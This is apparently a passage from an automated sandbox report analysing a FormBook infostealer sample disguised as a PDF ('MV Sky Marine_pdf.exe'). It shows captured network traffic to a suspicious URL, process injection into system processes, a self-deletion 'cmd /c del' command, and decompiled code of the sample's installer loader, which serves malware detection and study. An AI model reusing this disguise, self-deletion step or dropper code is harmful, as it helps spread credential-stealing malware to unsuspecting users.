    Location: http://antiracismbyu.com/m2be/?t8r=Nsc7yOpCpBP+OvQ//1jYzNnBC3WFsexPKF5AJOP3i6aMz/2MKahDz4LAsxw3nwyoR3zf&1bYxT=mTfpcdW
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
Mar 22, 2021 08:56:48.603634119 CET  5092                IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                Code Manipulations

Statistics

Charts: CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior (per-process interactive charts in the original report)

System Behavior

General

Start time: 08:54:43
Start date: 22/03/2021
Path: C:\Users\user\Desktop\MV Sky Marine_pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
Imagebase: 0x400000
File size: 211985 bytes
MD5 hash: 9558601F64F4D03A49BF20B3C0186AF0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.235033668.0000000002670000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 08:54:44
Start date: 22/03/2021
Path: C:\Users\user\Desktop\MV Sky Marine_pdf.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
Imagebase: 0x400000
File size: 211985 bytes
MD5 hash: 9558601F64F4D03A49BF20B3C0186AF0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.275644751.00000000009E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.275618923.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 08:54:49
Start date: 22/03/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff693d90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:55:03
Start date: 22/03/2021
Path: C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\wlanext.exe
Imagebase: 0x7ff797770000
File size: 78848 bytes
MD5 hash: CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496617029.0000000000F50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496712195.0000000000F80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 08:55:07
Start date: 22/03/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\MV Sky Marine_pdf.exe'
Imagebase: 0xf10000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:55:08
Start date: 22/03/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis


Executed Functions

C-Code - Quality: 78%
                                                                                                  			_entry_() {
                                                                                                  				intOrPtr _t47;
                                                                                                  				CHAR* _t51;
                                                                                                  				char* _t54;
                                                                                                  				CHAR* _t56;
                                                                                                  				void* _t60;
                                                                                                  				intOrPtr _t62;
                                                                                                  				int _t64;
                                                                                                  				char* _t67;
                                                                                                  				char* _t68;
                                                                                                  				int _t69;
                                                                                                  				char* _t71;
                                                                                                  				char* _t74;
                                                                                                  				int _t91;
                                                                                                  				void* _t95;
                                                                                                  				void* _t107;
                                                                                                  				intOrPtr* _t108;
                                                                                                  				char _t111;
                                                                                                  				CHAR* _t116;
                                                                                                  				char* _t117;
                                                                                                  				CHAR* _t118;
                                                                                                  				char* _t119;
                                                                                                  				void* _t121;
                                                                                                  				char* _t123;
                                                                                                  				char* _t125;
                                                                                                  				char* _t126;
                                                                                                  				void* _t128;
                                                                                                  				void* _t129;
                                                                                                  				intOrPtr _t147;
                                                                                                  
                                                                                                  				 *(_t129 + 0x20) = 0;
                                                                                                  				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                  				 *(_t129 + 0x1c) = 0;
                                                                                                  				 *(_t129 + 0x18) = 0x20;
                                                                                                  				SetErrorMode(0x8001); // executed
                                                                                                  				if(GetVersion() != 6) {
                                                                                                  					_t108 = E004060B4(0);
                                                                                                  					if(_t108 != 0) {
                                                                                                  						 *_t108(0xc00);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t118 = "UXTHEME";
                                                                                                  				goto L4;
                                                                                                  				while(1) {
                                                                                                  					L22:
                                                                                                  					_t111 =  *_t56;
                                                                                                  					_t134 = _t111;
                                                                                                  					if(_t111 == 0) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					__eflags = _t111 - 0x20;
                                                                                                  					if(_t111 != 0x20) {
                                                                                                  						L10:
                                                                                                  						__eflags =  *_t56 - 0x22;
                                                                                                  						 *((char*)(_t129 + 0x14)) = 0x20;
                                                                                                  						if( *_t56 == 0x22) {
                                                                                                  							_t56 =  &(_t56[1]);
                                                                                                  							__eflags = _t56;
                                                                                                  							 *((char*)(_t129 + 0x14)) = 0x22;
                                                                                                  						}
                                                                                                  						__eflags =  *_t56 - 0x2f;
                                                                                                  						if( *_t56 != 0x2f) {
                                                                                                  							L20:
                                                                                                  							_t56 = E00405842(_t56,  *((intOrPtr*)(_t129 + 0x14)));
                                                                                                  							__eflags =  *_t56 - 0x22;
                                                                                                  							if(__eflags == 0) {
                                                                                                  								_t56 =  &(_t56[1]);
                                                                                                  								__eflags = _t56;
                                                                                                  							}
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							_t56 =  &(_t56[1]);
                                                                                                  							__eflags =  *_t56 - 0x53;
                                                                                                  							if( *_t56 == 0x53) {
                                                                                                  								__eflags = (_t56[1] | 0x00000020) - 0x20;
                                                                                                  								if((_t56[1] | 0x00000020) == 0x20) {
                                                                                                  									_t14 = _t129 + 0x18;
                                                                                                  									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
                                                                                                  									__eflags =  *_t14;
                                                                                                  								}
                                                                                                  							}
                                                                                                  							__eflags =  *_t56 - 0x4352434e;
                                                                                                  							if( *_t56 == 0x4352434e) {
                                                                                                  								__eflags = (_t56[4] | 0x00000020) - 0x20;
                                                                                                  								if((_t56[4] | 0x00000020) == 0x20) {
                                                                                                  									_t17 = _t129 + 0x18;
                                                                                                  									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
                                                                                                  									__eflags =  *_t17;
                                                                                                  								}
                                                                                                  							}
                                                                                                  							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
                                                                                                  							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
                                                                                                  								 *((intOrPtr*)(_t56 - 2)) = 0;
                                                                                                  								__eflags =  &(_t56[2]);
                                                                                                  								E00405D24(0x7a8400,  &(_t56[2]));
                                                                                                  								L25:
                                                                                                  								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                                                                                  								GetTempPathA(0x400, _t116);
                                                                                                  								_t60 = E0040323E(_t134);
                                                                                                  								_t135 = _t60;
                                                                                                  								if(_t60 != 0) {
                                                                                                  									L27:
                                                                                                  									DeleteFileA("1033"); // executed
                                                                                                  									_t62 = E00402CA5(_t136,  *(_t129 + 0x18)); // executed
                                                                                                  									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
                                                                                                  									if(_t62 != 0) {
                                                                                                  										L37:
                                                                                                  										E00403685();
                                                                                                  										__imp__OleUninitialize();
                                                                                                  										_t143 =  *((intOrPtr*)(_t129 + 0x10));
                                                                                                  										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
                                                                                                  											__eflags =  *0x7a2834;
                                                                                                  											if( *0x7a2834 == 0) {
                                                                                                  												L64:
                                                                                                  												_t64 =  *0x7a284c;
                                                                                                  												__eflags = _t64 - 0xffffffff;
                                                                                                  												if(_t64 != 0xffffffff) {
                                                                                                  													 *(_t129 + 0x1c) = _t64;
                                                                                                  												}
                                                                                                  												ExitProcess( *(_t129 + 0x1c));
                                                                                                  											}
                                                                                                  											_t126 = E004060B4(5);
                                                                                                  											_t119 = E004060B4(6);
                                                                                                  											_t67 = E004060B4(7);
                                                                                                  											__eflags = _t126;
                                                                                                  											_t117 = _t67;
                                                                                                  											if(_t126 != 0) {
                                                                                                  												__eflags = _t119;
                                                                                                  												if(_t119 != 0) {
                                                                                                  													__eflags = _t117;
                                                                                                  													if(_t117 != 0) {
                                                                                                  														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
                                                                                                  														__eflags = _t74;
                                                                                                  														if(_t74 != 0) {
                                                                                                  															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
                                                                                                  															 *(_t129 + 0x3c) = 1;
                                                                                                  															 *(_t129 + 0x48) = 2;
                                                                                                  															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
                                                                                                  														}
                                                                                                  													}
                                                                                                  												}
                                                                                                  											}
                                                                                                  											_t68 = E004060B4(8);
                                                                                                  											__eflags = _t68;
                                                                                                  											if(_t68 == 0) {
                                                                                                  												L62:
                                                                                                  												_t69 = ExitWindowsEx(2, 0x80040002);
                                                                                                  												__eflags = _t69;
                                                                                                  												if(_t69 != 0) {
                                                                                                  													goto L64;
                                                                                                  												}
                                                                                                  												goto L63;
                                                                                                  											} else {
                                                                                                  												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
                                                                                                  												__eflags = _t71;
                                                                                                  												if(_t71 == 0) {
                                                                                                  													L63:
                                                                                                  													E0040140B(9);
                                                                                                  													goto L64;
                                                                                                  												}
                                                                                                  												goto L62;
                                                                                                  											}
                                                                                                  										}
                                                                                                  										E004055E5( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
                                                                                                  										ExitProcess(2);
                                                                                                  									}
                                                                                                  									if( *0x7a27bc == 0) {
                                                                                                  										L36:
                                                                                                  										 *0x7a284c =  *0x7a284c | 0xffffffff;
                                                                                                  										 *(_t129 + 0x1c) = E00403777( *0x7a284c);
                                                                                                  										goto L37;
                                                                                                  									}
                                                                                                  									_t123 = E00405842(_t125, 0);
                                                                                                  									while(_t123 >= _t125) {
                                                                                                  										__eflags =  *_t123 - 0x3d3f5f20;
                                                                                                  										if(__eflags == 0) {
                                                                                                  											break;
                                                                                                  										}
                                                                                                  										_t123 = _t123 - 1;
                                                                                                  										__eflags = _t123;
                                                                                                  									}
                                                                                                  									_t140 = _t123 - _t125;
                                                                                                  									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
                                                                                                  									if(_t123 < _t125) {
                                                                                                  										_t121 = E0040556C(_t143);
                                                                                                  										lstrcatA(_t116, "~nsu");
                                                                                                  										if(_t121 != 0) {
                                                                                                  											lstrcatA(_t116, "A");
                                                                                                  										}
                                                                                                  										lstrcatA(_t116, ".tmp");
                                                                                                  										_t127 = "C:\\Users\\alfons\\Desktop";
                                                                                                  										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
                                                                                                  											_push(_t116);
                                                                                                  											if(_t121 == 0) {
                                                                                                  												E0040554F();
                                                                                                  											} else {
                                                                                                  												E004054D2();
                                                                                                  											}
                                                                                                  											SetCurrentDirectoryA(_t116);
                                                                                                  											_t147 =  *0x7a8400; // 0x0
                                                                                                  											if(_t147 == 0) {
                                                                                                  												E00405D24(0x7a8400, _t127);
                                                                                                  											}
                                                                                                  											E00405D24(0x7a3000,  *(_t129 + 0x20));
                                                                                                  											 *0x7a3400 = 0x41;
                                                                                                  											_t128 = 0x1a;
                                                                                                  											do {
                                                                                                  												E00405D46(0, _t116, 0x79d958, 0x79d958,  *((intOrPtr*)( *0x7a27b0 + 0x120)));
                                                                                                  												DeleteFileA(0x79d958);
                                                                                                  												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
                                                                                                  													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe", 0x79d958, 1);
                                                                                                  													_t149 = _t91;
                                                                                                  													if(_t91 != 0) {
                                                                                                  														_push(0);
                                                                                                  														_push(0x79d958);
                                                                                                  														E00405A72(_t149);
                                                                                                  														E00405D46(0, _t116, 0x79d958, 0x79d958,  *((intOrPtr*)( *0x7a27b0 + 0x124)));
                                                                                                  														_t95 = E00405584(0x79d958);
                                                                                                  														if(_t95 != 0) {
                                                                                                  															CloseHandle(_t95);
                                                                                                  															 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                                  														}
                                                                                                  													}
                                                                                                  												}
                                                                                                  												 *0x7a3400 =  *0x7a3400 + 1;
                                                                                                  												_t128 = _t128 - 1;
                                                                                                  												_t151 = _t128;
                                                                                                  											} while (_t128 != 0);
                                                                                                  											_push(0);
                                                                                                  											_push(_t116);
                                                                                                  											E00405A72(_t151);
                                                                                                  										}
                                                                                                  										goto L37;
                                                                                                  									}
                                                                                                  									 *_t123 = 0;
                                                                                                  									_t124 =  &(_t123[4]);
                                                                                                  									if(E004058F8(_t140,  &(_t123[4])) == 0) {
                                                                                                  										goto L37;
                                                                                                  									}
                                                                                                  									E00405D24(0x7a8400, _t124);
                                                                                                  									E00405D24(0x7a8800, _t124);
                                                                                                  									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                                                                  									goto L36;
                                                                                                  								}
                                                                                                  								GetWindowsDirectoryA(_t116, 0x3fb);
                                                                                                  								lstrcatA(_t116, "\\Temp");
                                                                                                  								_t107 = E0040323E(_t135);
                                                                                                  								_t136 = _t107;
                                                                                                  								if(_t107 == 0) {
                                                                                                  									goto L37;
                                                                                                  								}
                                                                                                  								goto L27;
                                                                                                  							} else {
                                                                                                  								goto L20;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						goto L9;
                                                                                                  					}
                                                                                                  					do {
                                                                                                  						L9:
                                                                                                  						_t56 =  &(_t56[1]);
                                                                                                  						__eflags =  *_t56 - 0x20;
                                                                                                  					} while ( *_t56 == 0x20);
                                                                                                  					goto L10;
                                                                                                  				}
                                                                                                  				goto L25;
                                                                                                  				L4:
                                                                                                  				E00406046(_t118); // executed
                                                                                                  				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
                                                                                                  				if( *_t118 != 0) {
                                                                                                  					goto L4;
                                                                                                  				} else {
                                                                                                  					E004060B4(0xd);
                                                                                                  					_t47 = E004060B4(0xb);
                                                                                                  					 *0x7a27a4 = _t47;
                                                                                                  					__imp__#17();
                                                                                                  					__imp__OleInitialize(0); // executed
                                                                                                  					 *0x7a2858 = _t47;
                                                                                                  					SHGetFileInfoA(0x79dd58, 0, _t129 + 0x38, 0x160, 0); // executed
                                                                                                  					E00405D24(0x7a1fa0, "NSIS Error");
                                                                                                  					_t51 = GetCommandLineA();
                                                                                                  					_t125 = "\"C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe\" ";
                                                                                                  					E00405D24(_t125, _t51);
                                                                                                  					 *0x7a27a0 = GetModuleHandleA(0);
                                                                                                  					_t54 = _t125;
                                                                                                  					if("\"C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe\" " == 0x22) {
                                                                                                  						 *((char*)(_t129 + 0x14)) = 0x22;
                                                                                                  						_t54 =  &M007A8001;
                                                                                                  					}
                                                                                                  					_t56 = CharNextA(E00405842(_t54,  *((intOrPtr*)(_t129 + 0x14))));
                                                                                                  					 *(_t129 + 0x20) = _t56;
                                                                                                  					goto L22;
                                                                                                  				}
			}

Address column of the decompiled listing above (one instruction address per listed line, spilled into a separate column by extraction): addresses run from 0x00403280 to 0x0040367f, with some entries given as 0x00000000.
                                                                                                  0x004034fd
                                                                                                  0x0040350c
                                                                                                  0x00403510
                                                                                                  0x00403511
                                                                                                  0x0040351a
                                                                                                  0x00403513
                                                                                                  0x00403513
                                                                                                  0x00403513
                                                                                                  0x00403520
                                                                                                  0x00403526
                                                                                                  0x0040352c
                                                                                                  0x00403534
                                                                                                  0x00403534
                                                                                                  0x00403542
                                                                                                  0x00403549
                                                                                                  0x00403552
                                                                                                  0x00403558
                                                                                                  0x00403564
                                                                                                  0x0040356a
                                                                                                  0x00403574
                                                                                                  0x0040357e
                                                                                                  0x00403584
                                                                                                  0x00403586
                                                                                                  0x00403588
                                                                                                  0x00403589
                                                                                                  0x0040358a
                                                                                                  0x0040359b
                                                                                                  0x004035a1
                                                                                                  0x004035a8
                                                                                                  0x004035ab
                                                                                                  0x004035b1
                                                                                                  0x004035b1
                                                                                                  0x004035a8
                                                                                                  0x00403586
                                                                                                  0x004035b5
                                                                                                  0x004035bb
                                                                                                  0x004035bb
                                                                                                  0x004035bb
                                                                                                  0x004035be
                                                                                                  0x004035bf
                                                                                                  0x004035c0
                                                                                                  0x004035c0
                                                                                                  0x00000000
                                                                                                  0x0040350c
                                                                                                  0x0040346d
                                                                                                  0x0040346f
                                                                                                  0x0040347a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403482
                                                                                                  0x0040348d
                                                                                                  0x00403492
                                                                                                  0x00000000
                                                                                                  0x00403492
                                                                                                  0x00403407
                                                                                                  0x00403413
                                                                                                  0x00403418
                                                                                                  0x0040341d
                                                                                                  0x0040341f
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004033bc
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040336c
                                                                                                  0x0040336c
                                                                                                  0x0040336c
                                                                                                  0x0040336d
                                                                                                  0x0040336d
                                                                                                  0x00000000
                                                                                                  0x0040336c
                                                                                                  0x00000000
                                                                                                  0x004032bd
                                                                                                  0x004032be
                                                                                                  0x004032ca
                                                                                                  0x004032d0
                                                                                                  0x00000000
                                                                                                  0x004032d2
                                                                                                  0x004032d4
                                                                                                  0x004032db
                                                                                                  0x004032e0
                                                                                                  0x004032e5
                                                                                                  0x004032ec
                                                                                                  0x004032f2
                                                                                                  0x00403308
                                                                                                  0x00403318
                                                                                                  0x0040331d
                                                                                                  0x00403323
                                                                                                  0x0040332a
                                                                                                  0x0040333d
                                                                                                  0x00403342
                                                                                                  0x00403344
                                                                                                  0x00403346
                                                                                                  0x0040334b
                                                                                                  0x0040334b
                                                                                                  0x0040335b
                                                                                                  0x00403361
                                                                                                  0x00000000
                                                                                                  0x00403361

                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE ref: 00403295
                                                                                                  • GetVersion.KERNEL32 ref: 0040329B
                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032C4
                                                                                                  • #17.COMCTL32(0000000B,0000000D), ref: 004032E5
                                                                                                  • OleInitialize.OLE32(00000000), ref: 004032EC
                                                                                                  • SHGetFileInfoA.SHELL32(0079DD58,00000000,?,00000160,00000000), ref: 00403308
                                                                                                  • GetCommandLineA.KERNEL32(007A1FA0,NSIS Error), ref: 0040331D
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000), ref: 00403330
                                                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00409130), ref: 0040335B
                                                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033F2
                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403407
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403413
                                                                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040342A
                                                                                                    • Part of subcall function 004060B4: GetModuleHandleA.KERNEL32(?,?,?,004032D9,0000000D), ref: 004060C6
                                                                                                    • Part of subcall function 004060B4: GetProcAddress.KERNEL32(00000000,?), ref: 004060E1
                                                                                                  • OleUninitialize.OLE32(00000020), ref: 004034AB
                                                                                                  • ExitProcess.KERNEL32 ref: 004034CB
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000,00000020), ref: 004034DE
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000,00000020), ref: 004034ED
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000,00000020), ref: 004034F8
                                                                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000,00000020), ref: 00403504
                                                                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403520
                                                                                                  • DeleteFileA.KERNEL32(0079D958,0079D958,?,007A3000,?), ref: 0040356A
                                                                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\MV Sky Marine_pdf.exe,0079D958,00000001), ref: 0040357E
                                                                                                  • CloseHandle.KERNEL32(00000000,0079D958,0079D958,?,0079D958,00000000), ref: 004035AB
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403604
                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040365C
                                                                                                  • ExitProcess.KERNEL32 ref: 0040367F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                                  • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MV Sky Marine_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$~nsu
                                                                                                  • API String ID: 3469842172-4121373559
                                                                                                  • Opcode ID: fd6959f65afc166d02ab77986b710cdee00155cf2a4392c7fc2ba17e1fd47ed3
                                                                                                  • Instruction ID: 2a9d3a0459ab0a49b4f13aaa4ac5fd0070e0ff6b79a2365845b85e88f8dd116d
                                                                                                  • Opcode Fuzzy Hash: fd6959f65afc166d02ab77986b710cdee00155cf2a4392c7fc2ba17e1fd47ed3
                                                                                                  • Instruction Fuzzy Hash: 65A1D3709083416EE7216F659C49B2B7EACEF42309F04453FF941B62D2CB7C9A058A6F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 98%
                                                                                                  			E00405649(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				struct _WIN32_FIND_DATAA _v332;
                                                                                                  				signed int _t37;
                                                                                                  				char* _t49;
                                                                                                  				signed int _t52;
                                                                                                  				signed int _t55;
                                                                                                  				signed int _t61;
                                                                                                  				signed int _t63;
                                                                                                  				void* _t65;
                                                                                                  				signed int _t68;
                                                                                                  				CHAR* _t70;
                                                                                                  				CHAR* _t72;
                                                                                                  				char* _t75;
                                                                                                  
                                                                                                  				_t72 = _a4;
                                                                                                  				_t37 = E004058F8(__eflags, _t72);
                                                                                                  				_v12 = _t37;
                                                                                                  				if((_a8 & 0x00000008) != 0) {
                                                                                                  					_t63 = DeleteFileA(_t72); // executed
                                                                                                  					asm("sbb eax, eax");
                                                                                                  					_t65 =  ~_t63 + 1;
                                                                                                  					 *0x7a2828 =  *0x7a2828 + _t65;
                                                                                                  					return _t65;
                                                                                                  				}
                                                                                                  				_t68 = _a8 & 0x00000001;
                                                                                                  				__eflags = _t68;
                                                                                                  				_v8 = _t68;
                                                                                                  				if(_t68 == 0) {
                                                                                                  					L5:
                                                                                                  					E00405D24(0x79fda8, _t72);
                                                                                                  					__eflags = _t68;
                                                                                                  					if(_t68 == 0) {
                                                                                                  						E0040585E(_t72);
                                                                                                  					} else {
                                                                                                  						lstrcatA(0x79fda8, "\*.*");
                                                                                                  					}
                                                                                                  					__eflags =  *_t72;
                                                                                                  					if( *_t72 != 0) {
                                                                                                  						L10:
